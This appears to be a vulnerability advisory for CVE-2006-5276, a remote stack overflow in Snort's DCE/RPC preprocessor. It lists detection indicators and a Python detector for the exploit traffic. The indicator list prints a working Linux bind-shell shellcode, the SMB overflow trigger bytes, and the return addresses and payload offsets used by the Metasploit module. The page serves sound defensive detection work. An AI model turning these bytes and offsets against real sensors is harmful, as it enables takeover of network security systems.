CVE-2006-5276
published 2007-02-20


Priority: P2 (68) · Severity: critical · CVSS 2.0 base score: 10.0 · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available (Metasploit module, see below)
EPSS: 79.32% (99.6th percentile)
Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic.

Affected

7 ranges

Vendor      | Product           | Version range | Fixed in
snort       | snort             | <= 2.6.1.2    | 2.6.1.3
snort       | snort             |               |
snort       | snort             |               |
snort       | snort             |               |
sourcefire  | intrusion_sensor  |               |
sourcefire  | intrusion_sensor  |               |
sourcefire  | intrusion_sensor  |               |

Detection & IOCs (extracted from sources)

Ports:
  139/tcp  (NetBIOS Session Service / SMB, the destination port of the exploit traffic)
  4444/tcp (bind-shell listener opened by the Linux payload after exploitation)

Byte patterns:
  Linux x86 bind-shell payload (socket/bind/listen/accept, dup2 loop, execve /bin//sh; listens on 0x115c = 4444):
    \x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
  SMB header, command 0x75 (Tree Connect AndX), status 0, flags 0x18, flags2 0xc807:
    \xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8
  DCE/RPC bind PDU header (version 5, ptype 0x0b, flags first|last, little-endian data rep, frag_length 0x0210 = 528, call_id 1, max xmit/recv frag 0x10b8):
    \x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10
  Return address 0x7c941eed (little-endian) followed by the stack-adjust stub (nop; add esp, -0x1001; inc esp):
    \xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44
  NetBIOS Session Service message (type 0x00) with length field 0xDEAD:
    \x00\x00\xde\xad
  SMB Write AndX parameter block (WordCount 0x0e, AndXCommand 0xff, WriteMode 0x0080, DataLength 0x01ff):
    \x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80\x00\x48\x00\x00\x00\xff\x01
  • Exploit traffic targets TCP port 139 (NetBIOS/SMB) with crafted SMB Write AndX requests containing oversized DCE/RPC fragments; the Snort sensor itself is the victim, not the destination host.
  • Look for SMB traffic with a NetBIOS Session Service length field set to 0xDEAD (\x00\x00\xde\xad), which is the Metasploit module's static oversized length marker.
  • Detect two consecutive SMB Write AndX requests in a single TCP segment where the second Write AndX (\x0e\xff) carries an anomalously large DCE/RPC bind fragment — this is the overflow trigger pattern.
  • On Linux targets, watch for a new listener on TCP port 4444 spawned by the snort process after exploitation (portbind shellcode).
  • One Windows exploit variant uses a JMP ESP gadget at 0x7c941eed inside a standard Windows DLL (the little-endian bytes \xed\x1e\x94\x7c listed above, followed by the stack-adjust stub); look for EIP/RET control redirected to that address in crash dumps or memory forensics.
  • The Metasploit module instead uses a Windows Universal RET of 0x00407c01 (JMP ESP in snort.exe) with a payload offset of 289 bytes, and a Redhat 8 RET of 0xbffff110 with an offset of 317 bytes; both pairs are useful for stack-frame analysis.
  • SMB Tree Connect AndX targeting the IPC$ share path (\\<host>\IPC$) encoded in Unicode is present in all exploit variants as a precursor to the Write AndX overflow.
  • Affected Snort versions are 2.6.1, 2.6.1.1, 2.6.1.2, and 2.7.0 beta 1; the fix is Snort 2.6.1.3+ or 2.7 beta 2+. The DCE/RPC preprocessor must be enabled in snort.conf for the vulnerability to be exploitable.
  • Sourcefire Intrusion Sensor versions 4.1, 4.5, and 4.6 are also vulnerable; patching scope extends beyond open-source Snort.
  • The exploit is effective against any host on the Snort-monitored network segment; the destination host does not need to be running SMB, because Snort inspects the traffic passively and is itself the target.
  • The Metasploit module deregisters the FILTER, PCAPFILE, SNAPLEN, and TIMEOUT options and uses raw packet injection (PacketFu/pcap), so the attacker needs raw-socket / packet-injection capability on the monitored network.
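As an added worked example (not the page's own material and not the Metasploit module's code), the three detection indicators above expressed as a small Python inspector over one TCP segment. It assumes SMB Write AndX requests with WordCount 12 or 14, reads the DCE/RPC PDU through the SMB DataOffset/DataLength fields, and treats a bind PDU whose frag_length exceeds the bytes the Write AndX actually carried as the "oversized fragment" signal (the bytes listed above show exactly that: DataLength 0x01ff against frag_length 0x0210). The sample segments are constructed inline, not captured traffic; the 0xDEAD marker and the bind header bytes are the ones listed above.

```python
"""
Heuristic inspector for CVE-2006-5276 exploit traffic on 139/tcp.  It walks a
TCP payload as NetBIOS Session Service messages, extracts the DCE/RPC PDU
carried by each SMB Write AndX request and applies the indicators from the
list above.  Added example; the sample segments are constructed here.
"""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_WRITE_ANDX = 0x2F
SMB_HEADER_LEN = 32
DCERPC_PTYPE_BIND = 0x0B
NBSS_DEAD_LENGTH = 0x00DEAD      # static NetBIOS length marker noted above


def split_nbss(segment):
    """Return [(declared_length, body)] for each NetBIOS session message.
    A body shorter than its declared length (the 0xDEAD case) is returned
    truncated at the end of the segment instead of raising."""
    out, off = [], 0
    while off + 4 <= len(segment):
        declared = int.from_bytes(segment[off + 1:off + 4], "big")  # type byte, then 24-bit length
        body = segment[off + 4:off + 4 + declared]
        out.append((declared, body))
        off += 4 + len(body)
    return out


def write_andx_payload(smb):
    """Return the data carried by an SMB Write AndX request, else None."""
    if len(smb) <= SMB_HEADER_LEN or smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_WRITE_ANDX:
        return None
    word_count = smb[SMB_HEADER_LEN]
    params = smb[SMB_HEADER_LEN + 1:SMB_HEADER_LEN + 1 + 2 * word_count]
    if word_count < 12 or len(params) < 2 * word_count:
        return None
    # AndXCommand(1) Reserved(1) AndXOffset(2) FID(2) Offset(4) Timeout(4)
    # WriteMode(2) Remaining(2) DataLengthHigh(2) DataLength(2) DataOffset(2)
    len_high, len_low, data_off = struct.unpack_from("<HHH", params, 18)
    return smb[data_off:data_off + (len_high << 16 | len_low)]   # DataOffset is relative to the SMB header


def dcerpc_header(pdu):
    """Return (ptype, frag_length) of a DCE/RPC v5 PDU header, else None."""
    if len(pdu) < 10 or pdu[0] != 5:
        return None
    return pdu[2], struct.unpack_from("<H", pdu, 8)[0]


def inspect_segment(segment):
    """Return the sorted list of indicator names that fire on one TCP segment."""
    hits, pdus = set(), []
    for declared, body in split_nbss(segment):
        if declared == NBSS_DEAD_LENGTH:
            hits.add("nbss_length_0xdead")
        pdu = write_andx_payload(body)
        if pdu is not None:
            pdus.append(pdu)
    if len(pdus) >= 2:                      # weaker on its own: pipelined SMB can do this too
        hits.add("multiple_write_andx_in_segment")
    for pdu in pdus:
        hdr = dcerpc_header(pdu)
        # a bind whose frag_length claims more bytes than the Write AndX delivered
        if hdr and hdr[0] == DCERPC_PTYPE_BIND and hdr[1] > len(pdu):
            hits.add("oversized_dcerpc_bind_fragment")
    return sorted(hits)


# --- constructed samples (not captured traffic) ---------------------------

def bind_pdu(frag_length, carried):
    """DCE/RPC bind header as listed above, with a chosen frag_length, padded
    with zeros to `carried` bytes of actual data."""
    hdr = (b"\x05\x00\x0b\x03\x10\x00\x00\x00"
           + struct.pack("<HHI", frag_length, 0, 1) + b"\xb8\x10\xb8\x10")
    return (hdr + b"\x00" * carried)[:carried]


def write_andx_message(pdu, nbss_length=None):
    """NetBIOS-framed SMB Write AndX (WordCount 14) carrying `pdu`; an explicit
    nbss_length overrides the real one to mimic the 0xDEAD marker."""
    smb_header = SMB_MAGIC + bytes([SMB_COM_WRITE_ANDX]) + b"\x00" * 27
    data_off = SMB_HEADER_LEN + 1 + 28 + 2   # header, WordCount, 14 words, ByteCount
    params = struct.pack("<BBHHIIHHHHHI", 0xFF, 0, 0xDEDE, 0x4000, 0, 0xFFFFFFFF,
                         0x0080, len(pdu), len(pdu) >> 16, len(pdu) & 0xFFFF, data_off, 0)
    smb = smb_header + bytes([14]) + params + struct.pack("<H", len(pdu)) + pdu
    length = len(smb) if nbss_length is None else nbss_length
    return b"\x00" + length.to_bytes(3, "big") + smb


BENIGN_SEGMENT = write_andx_message(bind_pdu(72, 72))
EXPLOIT_SEGMENT = (write_andx_message(bind_pdu(0x0210, 0x01FF))
                   + write_andx_message(bind_pdu(0x0210, 0x01FF), nbss_length=NBSS_DEAD_LENGTH))

if __name__ == "__main__":
    for name, seg in (("benign", BENIGN_SEGMENT), ("exploit", EXPLOIT_SEGMENT)):
        print(name, inspect_segment(seg))
```

The "two Write AndX in one segment" indicator is deliberately kept separate from the frag_length check: legitimate SMB clients can pipeline writes, so on its own it is a hunting lead rather than an alert, while a bind PDU that claims more bytes than were delivered, or a NetBIOS length of exactly 0xDEAD, has no benign explanation on a production network.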